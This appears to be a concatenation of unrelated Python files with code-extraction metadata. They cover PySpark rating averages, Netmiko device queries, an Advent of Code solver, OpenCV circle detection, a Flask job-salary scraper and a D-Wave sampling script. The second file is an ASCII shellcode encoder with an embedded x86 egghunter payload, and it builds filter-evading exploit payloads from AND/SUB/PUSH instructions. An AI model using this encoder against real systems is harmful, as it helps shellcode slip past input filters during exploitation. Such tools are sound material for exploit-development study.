df = sqlContext.read.format("com.databricks.spark.csv").option("header", "true").option("inferschema", "true").load("ratings.csv")
df2 = sqlContext.read.format("com.databricks.spark.csv").option("header", "true").option("inferschema", "true").load("movies.csv")
rddmovies = df2.rdd
rddratings = df.rdd
suma = rddratings.map(lambda x: (x[1],x[2]))
count = suma.map(lambda x: (x[0],1))
suma = suma.reduceByKey(lambda a, b: float(a) + float(b))
count = count.reduceByKey(lambda a, b: a + b)
average = suma.join(count)
average = average.map(lambda x: (x[0], x[1][0]/x[1][1]))
moviesWithAverage = average.join(rddmovies)
moviesTable = moviesWithAverage.map(lambda x: (x[1][1], x[1][0]))
rddfinal = moviesTable.map(lambda x: (x[0][len(x[0])-5]+x[0][len(x[0])-4]+x[0][len(x[0])-3]+x[0][len(x[0])-2],x[0],x[1] if 5 <= len(x[0]) else x[0],x[0],x[1]))
rddfinal = rddfinal.filter(lambda x: x[0].isdigit())
rddfinal = rddfinal.map(lambda x: (x[0].encode("ascii", "ignore"), (x[1].encode("ascii", "ignore"),x[2])))
rddfinal = rddfinal.reduceByKey(lambda a,b: ((a[0], a[1]) if a[1] > b[1] else ((a [0] + "; " + b[0], b[1]) if a[1] == b[1] else (b[0], b[1])))).sortByKey()
rddfinal.saveAsTextFile("outputApartadoA.txt")
| [
"pyspark.SparkContext",
"pyspark.SparkConf",
"pyspark.SQLContext"
] | [((179, 202), 'pyspark.SparkContext', 'SparkContext', ([], {'conf': 'conf'}), '(conf=conf)\n', (191, 202), False, 'from pyspark import SparkConf, SparkContext\n'), ((218, 232), 'pyspark.SQLContext', 'SQLContext', (['sc'], {}), '(sc)\n', (228, 232), False, 'from pyspark import SQLContext\n'), ((136, 147), 'pyspark.SparkConf', 'SparkConf', ([], {}), '()\n', (145, 147), False, 'from pyspark import SparkConf, SparkContext\n')] |
#!/usr/bin/env python3
################################################################################
# INTRODUCTION
################################################################################
# Encoder Title: ASCII shellcode encoder via AND, SUB, PUSH
# Date: 26.6.2019
# Encoder Author: <NAME>, www.mmquant.net
# Tested on: Linux ubuntu 3.13.0-32-generic, x86
# Special thx to: Corelanc0d3r for intro to this technique
#
# Description:
# This encoder is based on egghunter found in https://www.exploit-db.com/exploits/5342
# Core idea is that every dword can be derived using 3 SUB instructions
# with operands consisting strictly of ASCII compatible bytes.
#
# What it does?:
# Suppose that we want to push \x05\xEB\xD1\x8B (0x8BD1EB05) to the stack.
# Than we can do it as follows:
#
# AND EAX, 3F465456
# AND EAX, 40392B29 ; Two AND instructions zero EAX
# SUB EAX, 3E716230 ; Subtracting 3 dwords consisting
# SUB EAX, 5D455523 ; of ASCII compatible bytes from 0x00000000
# SUB EAX, 5E5D7722 ; we get EAX = 0x8BD1EB05
# PUSH EAX
# Mandatory bytes:
# \x25 AND EAX, imm32
# \x2d SUB EAX, imm32
# \x50 PUSH EAX
# \x61 POPAD
# How to use:
# Edit the SETTINGS section and simply run as
# ./ASCIIencoder
# ProTip:
# Take special attention to the memory between the end of decoder instructions
# and the beginning of decoded shellcode. Program flow must seamlessly step over
# this memory. If this "bridge memory area" contains illegal opcodes they can
# be rewritten with additional PUSH instruction appended to the end of generated
# shellcode. Use for example PUSH 0x41414141.
################################################################################
import itertools
import struct
import random
import sys
assert sys.version_info >= (3, 6)
################################################################################
# CONSTANTS - no changes needed here
################################################################################
# ASCII character set
L_CASE = bytearray(range(0x61, 0x7b)) # abcdefghijklmnopqrstuvwxyz
U_CASE = bytearray(range(0x41, 0x5b)) # ABCDEFGHIJKLMNOPQRSTUVWXYZ
NUMBERS = bytearray(range(0x30, 0x3a)) # 0123456789
SPECIAL_CHARS = bytearray(
itertools.chain(
range(0x21, 0x30), # !"#$%&\'()*+,-.
range(0x3a, 0x41), # :;<=>?
range(0x5b, 0x61), # [\\]^_
range(0x7b, 0x7f) # {|}
)
)
ASCII_NOPS = b'\x41\x42\x43\x44' # and many more
ALL_CHARS = (L_CASE + U_CASE + NUMBERS + SPECIAL_CHARS)
################################################################################
# SETTINGS - enter shellcode, select character set and bad chars
################################################################################
input_shellcode = (
b'\x8b\xd1\xeb\x05\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e'
b'\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf'
b'\x75\xe7\xff\xe7'
)
# input_charset = U_CASE + L_CASE
input_charset = ALL_CHARS
# badchars = b''
badchars = b''
nops = ASCII_NOPS
################################################################################
# CORE - no changes needed here
################################################################################
class ASCII_Encoder(object):
def __init__(self, shellcode_, charset_, badchars_, nops_):
# Constructor args
self.shellcode = bytearray(shellcode_)
self.charset = charset_
self.badchars = badchars_
self.nops = nops_
# Private vars
self.encoded_dwords = []
self.twos_comps = []
self.sub_operands = []
self.payload = bytearray()
def encode(self):
self.align_to_dwords()
self.remove_badchars()
self.derive_dwords_sub()
self.compensate_overflow()
self.derived_dwords_to_sub_operands()
self.twos_comp_check()
self.compile_payload()
def align_to_dwords(self):
# Input shellcode alignment to dword multiples
nop = b'\x90'
pad_count = 4 - (len(self.shellcode) % 4)
if 0 < pad_count < 4:
self.shellcode += nop * pad_count
def remove_badchars(self):
for badchar in self.badchars:
self.charset = self.charset.replace(bytes([badchar]), b'')
self.nops = self.nops.replace(bytes([badchar]), b'')
def derive_dwords_sub(self):
def get_sub_encoding_bytes(target):
"""
target x y z
0x100 - (0x21+0x21) = 0xbe
We need to select x, y, z such that it gives target when summed and all of
x, y, z is ASCII and non-badchar
"""
# Get all possible solutions
all_xy = list(itertools.combinations_with_replacement(self.charset, 2))
results = []
for x, y in all_xy:
z = target - (x + y)
# Get only bytes which are ASCII and non-badchar
if (0 < z < 256) and (z in self.charset):
results.append({
'x': x,
'y': y,
'z': z,
'of': True if target >= 0x100 else False
})
# Choose random solution
return random.choice(results)
for dword in struct.iter_unpack('<L', self.shellcode):
# 32-bit 2's complement
twos_comp = (dword[0] ^ 0xffffffff) + 1
self.twos_comps.append(twos_comp)
encoded_block = []
for byte_ in struct.pack('>L', twos_comp):
# Will overflow be used when calculating this byte using 3 SUB instructions?
if byte_ / 3 < min(self.charset):
byte_ += 0x100
encoded_block.append(
get_sub_encoding_bytes(byte_))
pass
self.encoded_dwords.append(encoded_block)
def compensate_overflow(self):
# If neighbor lower byte overflow then subtract 1 from max(x, y, z)
for dword in self.encoded_dwords:
for solution, next_solution in zip(dword, dword[1:]):
if next_solution['of']:
max_value_key = max(solution, key=solution.get)
solution[max_value_key] -= 1
def derived_dwords_to_sub_operands(self):
for dword in self.encoded_dwords:
sub_operand_0 = struct.pack('<BBBB',
*[solution['x'] for solution in dword])
sub_operand_1 = struct.pack('<BBBB',
*[solution['y'] for solution in dword])
sub_operand_2 = struct.pack('<BBBB',
*[solution['z'] for solution in dword])
self.sub_operands.append([
sub_operand_0,
sub_operand_1,
sub_operand_2
])
def twos_comp_check(self):
# Check if calculated dwords for SUB instruction give 2's complement if they are summed
for twos_comp, sub_operand in zip(self.twos_comps, self.sub_operands):
sup_operand_sum = sum(
[int.from_bytes(dw, byteorder='big') for dw in sub_operand])
# Correction of sum if there is overflow on the highest byte
if sup_operand_sum > 0xffffffff:
sup_operand_sum -= 0x100000000
assert (twos_comp == sup_operand_sum)
def compile_payload(self):
def derive_bytes_and():
all_xy = list(itertools.combinations_with_replacement(self.charset, 2))
results = []
for x, y in all_xy:
if x + y == 127:
results.append((x, y))
while 1:
yield random.choice(results)
def derive_dwords_and():
gen_bytes = derive_bytes_and()
bytes_ = []
for _ in range(0, 4):
bytes_.append(next(gen_bytes))
return bytes_
# POPAD n times to adjust ESP.
# Decoded shellcode must be written after the decoder stub
self.payload += b'\x61' * (len(self.encoded_dwords))
for sub_operand in reversed(self.sub_operands):
# Clearing EAX instructions with AND instructions
bytes_ = derive_dwords_and()
self.payload += b'\x25' + struct.pack('<BBBB',
*[byte_[0] for byte_ in bytes_])
self.payload += b'\x25' + struct.pack('<BBBB',
*[byte_[1] for byte_ in bytes_])
# Encoded shellcode with SUB instructions
self.payload += b'\x2d' + sub_operand[0][::-1]
self.payload += b'\x2d' + sub_operand[1][::-1]
self.payload += b'\x2d' + sub_operand[2][::-1]
# Push EAX
self.payload += b'\x50'
# Pad with NOPs
self.payload += bytes(random.choices(self.nops, k=9))
def print_payload(self):
print('Original payload length: {}'.format(len(input_shellcode)))
print('Encoded payload length: {}'.format(len(self.payload)))
print('hex: ',
'\\x' + '\\x'.join('{:02x}'.format(byte) for byte in self.payload))
if __name__ == '__main__':
encoder = ASCII_Encoder(input_shellcode, input_charset, badchars, nops)
encoder.encode()
encoder.print_payload()
| [
"random.choice",
"struct.iter_unpack",
"struct.pack",
"random.choices",
"itertools.combinations_with_replacement"
] | [((5369, 5409), 'struct.iter_unpack', 'struct.iter_unpack', (['"""<L"""', 'self.shellcode'], {}), "('<L', self.shellcode)\n", (5387, 5409), False, 'import struct\n'), ((5324, 5346), 'random.choice', 'random.choice', (['results'], {}), '(results)\n', (5337, 5346), False, 'import random\n'), ((5603, 5631), 'struct.pack', 'struct.pack', (['""">L"""', 'twos_comp'], {}), "('>L', twos_comp)\n", (5614, 5631), False, 'import struct\n'), ((6474, 6534), 'struct.pack', 'struct.pack', (['"""<BBBB"""', "*[solution['x'] for solution in dword]"], {}), "('<BBBB', *[solution['x'] for solution in dword])\n", (6485, 6534), False, 'import struct\n'), ((6603, 6663), 'struct.pack', 'struct.pack', (['"""<BBBB"""', "*[solution['y'] for solution in dword]"], {}), "('<BBBB', *[solution['y'] for solution in dword])\n", (6614, 6663), False, 'import struct\n'), ((6732, 6792), 'struct.pack', 'struct.pack', (['"""<BBBB"""', "*[solution['z'] for solution in dword]"], {}), "('<BBBB', *[solution['z'] for solution in dword])\n", (6743, 6792), False, 'import struct\n'), ((9026, 9056), 'random.choices', 'random.choices', (['self.nops'], {'k': '(9)'}), '(self.nops, k=9)\n', (9040, 9056), False, 'import random\n'), ((4771, 4827), 'itertools.combinations_with_replacement', 'itertools.combinations_with_replacement', (['self.charset', '(2)'], {}), '(self.charset, 2)\n', (4810, 4827), False, 'import itertools\n'), ((7608, 7664), 'itertools.combinations_with_replacement', 'itertools.combinations_with_replacement', (['self.charset', '(2)'], {}), '(self.charset, 2)\n', (7647, 7664), False, 'import itertools\n'), ((8443, 8496), 'struct.pack', 'struct.pack', (['"""<BBBB"""', '*[byte_[0] for byte_ in bytes_]'], {}), "('<BBBB', *[byte_[0] for byte_ in bytes_])\n", (8454, 8496), False, 'import struct\n'), ((8580, 8633), 'struct.pack', 'struct.pack', (['"""<BBBB"""', '*[byte_[1] for byte_ in bytes_]'], {}), "('<BBBB', *[byte_[1] for byte_ in bytes_])\n", (8591, 8633), False, 'import struct\n'), ((7842, 7864), 
'random.choice', 'random.choice', (['results'], {}), '(results)\n', (7855, 7864), False, 'import random\n')] |
from __future__ import print_function, unicode_literals
from datetime import datetime
from netmiko import ConnectHandler
from my_devices import device_list
def Netmiko_connect(device,command):
"""Execute show version command using Netmiko."""
print()
print("#" * 80)
remote_conn = ConnectHandler(**device)
output = remote_conn.send_command_expect("show version")
remote_conn.disconnect()
return output
def main():
start_time = datetime.now()
for device in device_list:
output =Netmiko_connect(device, "show version")
print(output)
print("\nElapsed time: " + str(datetime.now() - start_time))
if __name__ == "__main__":
main()
| [
"netmiko.ConnectHandler",
"datetime.datetime.now"
] | [((300, 324), 'netmiko.ConnectHandler', 'ConnectHandler', ([], {}), '(**device)\n', (314, 324), False, 'from netmiko import ConnectHandler\n'), ((465, 479), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (477, 479), False, 'from datetime import datetime\n'), ((630, 644), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (642, 644), False, 'from datetime import datetime\n')] |
# https://adventofcode.com/2021/day/9
from math import prod
from src.util.types import Data, Point2, Solution
def prepare_data(data: str) -> tuple[tuple[tuple[int, ...], ...], list[Point2]]:
heightmap = tuple(tuple(int(x) for x in list(line)) for line in data.splitlines())
low_points = get_low_points(heightmap)
return heightmap, low_points
def get_neighbors(x, y, max_x, max_y):
neighbors = []
if x > 0:
neighbors.append(Point2(x - 1, y))
if x < max_x:
neighbors.append(Point2(x + 1, y))
if y > 0:
neighbors.append(Point2(x, y - 1))
if y < max_y:
neighbors.append(Point2(x, y + 1))
return neighbors
def get_low_points(heightmap: tuple[tuple[int, ...], ...]) -> list[Point2]:
low_points = []
max_x = len(heightmap[0]) - 1
max_y = len(heightmap) - 1
for y, row in enumerate(heightmap):
for x, height in enumerate(row):
neighbors = get_neighbors(x, y, max_x, max_y)
if all(height < heightmap[n.y][n.x] for n in neighbors):
low_points.append(Point2(x, y))
return low_points
def flood_fill(heightmap, origin, max_x, max_y):
neighbors = [origin]
basin_members = {origin}
while neighbors:
current = neighbors.pop()
new_neighbors = get_neighbors(current.x, current.y, max_x, max_y)
for nn in new_neighbors:
# Assuming all basins are surrounded by nines, which is true for the sample.
if nn not in basin_members and heightmap[nn.y][nn.x] < 9:
neighbors.append(nn)
basin_members.add(nn)
return len(basin_members)
def part_1(heightmap, low_points):
return sum(heightmap[lp.y][lp.x] + 1 for lp in low_points)
def part_2(heightmap, low_points):
max_x = len(heightmap[0]) - 1
max_y = len(heightmap) - 1
basin_sizes = [flood_fill(heightmap, lp, max_x, max_y) for lp in low_points]
basin_sizes.sort(reverse=True)
return prod(basin_sizes[:3])
def solve(data: Data) -> Solution:
solution = Solution()
sample_data = prepare_data(data.samples[0])
solution.samples_part_1.append(part_1(*sample_data))
solution.samples_part_2.append(part_2(*sample_data))
challenge_data = prepare_data(data.input)
solution.part_1 = part_1(*challenge_data)
solution.part_2 = part_2(*challenge_data)
return solution
| [
"src.util.types.Point2",
"src.util.types.Solution",
"math.prod"
] | [((1976, 1997), 'math.prod', 'prod', (['basin_sizes[:3]'], {}), '(basin_sizes[:3])\n', (1980, 1997), False, 'from math import prod\n'), ((2050, 2060), 'src.util.types.Solution', 'Solution', ([], {}), '()\n', (2058, 2060), False, 'from src.util.types import Data, Point2, Solution\n'), ((457, 473), 'src.util.types.Point2', 'Point2', (['(x - 1)', 'y'], {}), '(x - 1, y)\n', (463, 473), False, 'from src.util.types import Data, Point2, Solution\n'), ((518, 534), 'src.util.types.Point2', 'Point2', (['(x + 1)', 'y'], {}), '(x + 1, y)\n', (524, 534), False, 'from src.util.types import Data, Point2, Solution\n'), ((575, 591), 'src.util.types.Point2', 'Point2', (['x', '(y - 1)'], {}), '(x, y - 1)\n', (581, 591), False, 'from src.util.types import Data, Point2, Solution\n'), ((636, 652), 'src.util.types.Point2', 'Point2', (['x', '(y + 1)'], {}), '(x, y + 1)\n', (642, 652), False, 'from src.util.types import Data, Point2, Solution\n'), ((1080, 1092), 'src.util.types.Point2', 'Point2', (['x', 'y'], {}), '(x, y)\n', (1086, 1092), False, 'from src.util.types import Data, Point2, Solution\n')] |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cv2
import numpy as np
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("filename", type=str)
args = parser.parse_args()
im = cv2.imread(args.filename)
gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(gray, (5, 5), 0)
ret, thresh = cv2.threshold(blurred, 0, 255, cv2.THRESH_BINARY |
cv2.THRESH_OTSU)
hsv = cv2.cvtColor(im, cv2.COLOR_BGR2HSV)
# hsv_blurred = cv2.GaussianBlur(hsv, (5, 5), 0)
hsv_blurred = hsv
ret, thresh_h = cv2.threshold(hsv_blurred[:, :, 0], 0, 255,
cv2.THRESH_BINARY | cv2.THRESH_OTSU)
ret, thresh_s = cv2.threshold(hsv_blurred[:, :, 1], 0, 255,
cv2.THRESH_BINARY | cv2.THRESH_OTSU)
ret, thresh_v = cv2.threshold(hsv_blurred[:, :, 2], 0, 255,
cv2.THRESH_BINARY | cv2.THRESH_OTSU)
# threshold on each of the channels, see what happens
img = gray.copy()
cimg = im.copy()
circles = cv2.HoughCircles(img,cv2.HOUGH_GRADIENT,1,20,
param1=50,param2=30,minRadius=0,maxRadius=0)
circles = np.uint16(np.around(circles))
for i in circles[0,:]:
# draw the outer circle
cv2.circle(cimg,(i[0],i[1]),i[2],(0,255,0),2)
# draw the center of the circle
cv2.circle(cimg,(i[0],i[1]),2,(0,0,255),3)
cv2.imshow('detected circles',cimg)
cv2.imshow("Image", im)
cv2.imshow("thresh bw", thresh)
cv2.imshow("thresh hue", thresh_h)
cv2.imshow("thresh sat", thresh_s)
cv2.imshow("thresh val", thresh_v)
cv2.waitKey(0)
cv2.destroyAllWindows()
| [
"argparse.ArgumentParser",
"cv2.threshold",
"cv2.HoughCircles",
"cv2.imshow",
"cv2.waitKey",
"cv2.circle",
"cv2.destroyAllWindows",
"numpy.around",
"cv2.cvtColor",
"cv2.GaussianBlur",
"cv2.imread"
] | [((632, 657), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (655, 657), False, 'import argparse\n'), ((733, 758), 'cv2.imread', 'cv2.imread', (['args.filename'], {}), '(args.filename)\n', (743, 758), False, 'import cv2\n'), ((766, 802), 'cv2.cvtColor', 'cv2.cvtColor', (['im', 'cv2.COLOR_BGR2GRAY'], {}), '(im, cv2.COLOR_BGR2GRAY)\n', (778, 802), False, 'import cv2\n'), ((813, 846), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['gray', '(5, 5)', '(0)'], {}), '(gray, (5, 5), 0)\n', (829, 846), False, 'import cv2\n'), ((861, 928), 'cv2.threshold', 'cv2.threshold', (['blurred', '(0)', '(255)', '(cv2.THRESH_BINARY | cv2.THRESH_OTSU)'], {}), '(blurred, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n', (874, 928), False, 'import cv2\n'), ((944, 979), 'cv2.cvtColor', 'cv2.cvtColor', (['im', 'cv2.COLOR_BGR2HSV'], {}), '(im, cv2.COLOR_BGR2HSV)\n', (956, 979), False, 'import cv2\n'), ((1064, 1149), 'cv2.threshold', 'cv2.threshold', (['hsv_blurred[:, :, 0]', '(0)', '(255)', '(cv2.THRESH_BINARY | cv2.THRESH_OTSU)'], {}), '(hsv_blurred[:, :, 0], 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU\n )\n', (1077, 1149), False, 'import cv2\n'), ((1169, 1254), 'cv2.threshold', 'cv2.threshold', (['hsv_blurred[:, :, 1]', '(0)', '(255)', '(cv2.THRESH_BINARY | cv2.THRESH_OTSU)'], {}), '(hsv_blurred[:, :, 1], 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU\n )\n', (1182, 1254), False, 'import cv2\n'), ((1274, 1359), 'cv2.threshold', 'cv2.threshold', (['hsv_blurred[:, :, 2]', '(0)', '(255)', '(cv2.THRESH_BINARY | cv2.THRESH_OTSU)'], {}), '(hsv_blurred[:, :, 2], 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU\n )\n', (1287, 1359), False, 'import cv2\n'), ((1463, 1563), 'cv2.HoughCircles', 'cv2.HoughCircles', (['img', 'cv2.HOUGH_GRADIENT', '(1)', '(20)'], {'param1': '(50)', 'param2': '(30)', 'minRadius': '(0)', 'maxRadius': '(0)'}), '(img, cv2.HOUGH_GRADIENT, 1, 20, param1=50, param2=30,\n minRadius=0, maxRadius=0)\n', (1479, 1563), False, 'import cv2\n'), ((1807, 1843), 
'cv2.imshow', 'cv2.imshow', (['"""detected circles"""', 'cimg'], {}), "('detected circles', cimg)\n", (1817, 1843), False, 'import cv2\n'), ((1847, 1870), 'cv2.imshow', 'cv2.imshow', (['"""Image"""', 'im'], {}), "('Image', im)\n", (1857, 1870), False, 'import cv2\n'), ((1871, 1902), 'cv2.imshow', 'cv2.imshow', (['"""thresh bw"""', 'thresh'], {}), "('thresh bw', thresh)\n", (1881, 1902), False, 'import cv2\n'), ((1903, 1937), 'cv2.imshow', 'cv2.imshow', (['"""thresh hue"""', 'thresh_h'], {}), "('thresh hue', thresh_h)\n", (1913, 1937), False, 'import cv2\n'), ((1938, 1972), 'cv2.imshow', 'cv2.imshow', (['"""thresh sat"""', 'thresh_s'], {}), "('thresh sat', thresh_s)\n", (1948, 1972), False, 'import cv2\n'), ((1973, 2007), 'cv2.imshow', 'cv2.imshow', (['"""thresh val"""', 'thresh_v'], {}), "('thresh val', thresh_v)\n", (1983, 2007), False, 'import cv2\n'), ((2009, 2023), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (2020, 2023), False, 'import cv2\n'), ((2024, 2047), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (2045, 2047), False, 'import cv2\n'), ((1602, 1620), 'numpy.around', 'np.around', (['circles'], {}), '(circles)\n', (1611, 1620), True, 'import numpy as np\n'), ((1678, 1730), 'cv2.circle', 'cv2.circle', (['cimg', '(i[0], i[1])', 'i[2]', '(0, 255, 0)', '(2)'], {}), '(cimg, (i[0], i[1]), i[2], (0, 255, 0), 2)\n', (1688, 1730), False, 'import cv2\n'), ((1764, 1813), 'cv2.circle', 'cv2.circle', (['cimg', '(i[0], i[1])', '(2)', '(0, 0, 255)', '(3)'], {}), '(cimg, (i[0], i[1]), 2, (0, 0, 255), 3)\n', (1774, 1813), False, 'import cv2\n')] |
from setuptools import find_packages, setup
import re
# parse dyneusr/_version.py
try:
version_fn = 'dyneusr/_version.py'
with open(version_fn) as version_fd:
version = version_fd.read()
version_re = r"^__version__ = ['\"]([^'\"]*)['\"]"
version = re.findall(version_re, version, re.M)[0]
except:
raise RuntimeError("Unable to read version in {}.".format(version_fn))
# parse requirements.txt
with open('requirements.txt') as f:
install_requires = [_ for _ in f.read().split('\n')
if len(_) and _[0].isalpha()]
# parse README.md
with open('README.md') as f:
long_description = f.read()
# run setup
setup(
name='dyneusr',
version=version,
description='Dynamical Neural Spatiotemporal Representations.',
long_description=long_description,
long_description_content_type="text/markdown",
author='<NAME>',
author_email='<EMAIL>',
url='https://braindynamicslab.github.io/dyneusr',
license='BSD-3',
packages=find_packages(),
include_package_data=True,
install_requires=install_requires,
python_requires='>=3.6',
classifiers=[
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering :: Information Analysis",
"Topic :: Scientific/Engineering :: Visualization",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
],
keywords='brain dynamics, topology data analysis, neuroimaging, brain networks, mapper, visualization',
)
| [
"re.findall",
"setuptools.find_packages"
] | [((273, 310), 're.findall', 're.findall', (['version_re', 'version', 're.M'], {}), '(version_re, version, re.M)\n', (283, 310), False, 'import re\n'), ((1008, 1023), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (1021, 1023), False, 'from setuptools import find_packages, setup\n')] |
from flask import Flask, render_template, request
from api_hh_skills import parsing_skills
from api_hh_salary import parsing_av_salary
from db_sqlalchemy_creator import Vacancy_info, City, Vacancy, Contacts
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from sqlalchemy import exc
from datetime import datetime
app = Flask(__name__)
engine = create_engine('sqlite:///orm1.sqlite', echo=False)
Base = declarative_base()
@app.route('/')
def main_index():
return render_template('index.html')
@app.route('/request_sgk')
def request_sgk():
return render_template('request_sgk.html')
@app.route('/request_api')
def request_api():
return render_template('request_api.html')
@app.route('/parsing_answer', methods = ['POST'])
def parsing_answer():
city = request.form['city']
vacancy = request.form['vacancy']
# Получение информации по средней зарплате путем парсинга сайта
av_salary = round(parsing_av_salary(city, vacancy), 2)
if av_salary == 0:
av_salary = 'Нет информации'
# Получение информации об основных навыках путем парсинга сайта
skills_list = parsing_skills(city, vacancy)
len_skills = len(skills_list)
if len_skills == 0:
skills_info = 'Нет информации'
else:
skills_info = ''
for i in range(len_skills-1):
skills_info = skills_info + skills_list[i] + ', '
skills_info = skills_info + skills_list[len_skills-1]
# Наполнение шаблона для передачи информации на сайт
data = {
'city': city,
'vacancy': vacancy,
'av_salary': av_salary,
'skills_info': skills_info}
# Загрузка полученной информации в базу SQLAlchemy
try:
session.add(City(city))
session.commit()
except exc.IntegrityError:
session.rollback()
try:
session.add(Vacancy(vacancy))
session.commit()
except exc.IntegrityError:
session.rollback()
try:
session.add(Vacancy_info(session.query(City).filter(City.city == city).first().id,
session.query(Vacancy).filter(Vacancy.vacancy == vacancy).first().id,
av_salary, skills_info))
session.commit()
except exc.IntegrityError:
session.rollback()
return render_template('parsing_answer.html', data=data)
@app.route('/contacts')
def contacts():
return render_template('contacts.html')
@app.route('/contacts_ok', methods = ['POST'])
def contacts_ok():
email = request.form['email']
name = request.form['name']
post_mail = request.form['post_mail']
message = request.form['message'].strip()
# Загрузка полученной информации в базу SQLAlchemy + сегодняшняя дата
try:
session.add(Contacts(email, name, post_mail, message, datetime.today()))
session.commit()
except exc.IntegrityError:
session.rollback()
return render_template('contacts_ok.html', message=message)
if __name__ == "__main__":
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
# app.run() # в режиме отладки на одном компьютере
# хорош для начала разработки на локальном сервере. Но это потребует ручного перезапуска сервера после каждого изменения в коде.
# app.run(host='0.0.0.0') # сделать сервер общедоступным в локальной сети
app.run(debug=True) # сервер будет сам перегружаться после каждого изменения в коде | [
"flask.render_template",
"sqlalchemy.orm.sessionmaker",
"flask.Flask",
"sqlalchemy.create_engine",
"api_hh_salary.parsing_av_salary",
"db_sqlalchemy_creator.City",
"db_sqlalchemy_creator.Vacancy",
"sqlalchemy.ext.declarative.declarative_base",
"datetime.datetime.today",
"api_hh_skills.parsing_skil... | [((403, 418), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (408, 418), False, 'from flask import Flask, render_template, request\n'), ((428, 478), 'sqlalchemy.create_engine', 'create_engine', (['"""sqlite:///orm1.sqlite"""'], {'echo': '(False)'}), "('sqlite:///orm1.sqlite', echo=False)\n", (441, 478), False, 'from sqlalchemy import create_engine\n'), ((486, 504), 'sqlalchemy.ext.declarative.declarative_base', 'declarative_base', ([], {}), '()\n', (502, 504), False, 'from sqlalchemy.ext.declarative import declarative_base\n'), ((550, 579), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (565, 579), False, 'from flask import Flask, render_template, request\n'), ((638, 673), 'flask.render_template', 'render_template', (['"""request_sgk.html"""'], {}), "('request_sgk.html')\n", (653, 673), False, 'from flask import Flask, render_template, request\n'), ((731, 766), 'flask.render_template', 'render_template', (['"""request_api.html"""'], {}), "('request_api.html')\n", (746, 766), False, 'from flask import Flask, render_template, request\n'), ((1190, 1219), 'api_hh_skills.parsing_skills', 'parsing_skills', (['city', 'vacancy'], {}), '(city, vacancy)\n', (1204, 1219), False, 'from api_hh_skills import parsing_skills\n'), ((2414, 2463), 'flask.render_template', 'render_template', (['"""parsing_answer.html"""'], {'data': 'data'}), "('parsing_answer.html', data=data)\n", (2429, 2463), False, 'from flask import Flask, render_template, request\n'), ((2516, 2548), 'flask.render_template', 'render_template', (['"""contacts.html"""'], {}), "('contacts.html')\n", (2531, 2548), False, 'from flask import Flask, render_template, request\n'), ((3038, 3090), 'flask.render_template', 'render_template', (['"""contacts_ok.html"""'], {'message': 'message'}), "('contacts_ok.html', message=message)\n", (3053, 3090), False, 'from flask import Flask, render_template, request\n'), ((3170, 3195), 
'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'engine'}), '(bind=engine)\n', (3182, 3195), False, 'from sqlalchemy.orm import sessionmaker\n'), ((1003, 1035), 'api_hh_salary.parsing_av_salary', 'parsing_av_salary', (['city', 'vacancy'], {}), '(city, vacancy)\n', (1020, 1035), False, 'from api_hh_salary import parsing_av_salary\n'), ((1817, 1827), 'db_sqlalchemy_creator.City', 'City', (['city'], {}), '(city)\n', (1821, 1827), False, 'from db_sqlalchemy_creator import Vacancy_info, City, Vacancy, Contacts\n'), ((1947, 1963), 'db_sqlalchemy_creator.Vacancy', 'Vacancy', (['vacancy'], {}), '(vacancy)\n', (1954, 1963), False, 'from db_sqlalchemy_creator import Vacancy_info, City, Vacancy, Contacts\n'), ((2921, 2937), 'datetime.datetime.today', 'datetime.today', ([], {}), '()\n', (2935, 2937), False, 'from datetime import datetime\n')] |
import sys
import dimod
import dwave.inspector
from minorminer import find_embedding
from dwave.cloud import Client
from dwave.embedding import embed_bqm, unembed_sampleset
from dwave.embedding.utils import edgelist_to_adjacency
# define problem
bqm = dimod.BQM.from_ising({}, {'ab': 1, 'bc': 1, 'ca': 1})
# or, load it from file (if provided)
if len(sys.argv) > 1:
path = sys.argv[1]
with open(path) as fp:
bqm = dimod.BinaryQuadraticModel.from_coo(fp).spin
# get solver
print("solver init")
client = Client.from_config()
solver = client.get_solver(qpu=True)
# embed
print("embedding")
source_edgelist = list(bqm.quadratic) + [(v, v) for v in bqm.linear]
target_edgelist = solver.edges
embedding = find_embedding(source_edgelist, target_edgelist)
target_adjacency = edgelist_to_adjacency(target_edgelist)
bqm_embedded = embed_bqm(bqm, embedding, target_adjacency)
# sample
print("sampling")
response = solver.sample_ising(bqm_embedded.linear, bqm_embedded.quadratic,
num_reads=100, label="bqm/response inspector example")
sampleset_embedded = response.sampleset
sampleset = unembed_sampleset(sampleset_embedded, embedding, bqm)
# inspect
print("inspecting")
dwave.inspector.show(bqm, dict(embedding=embedding), response)
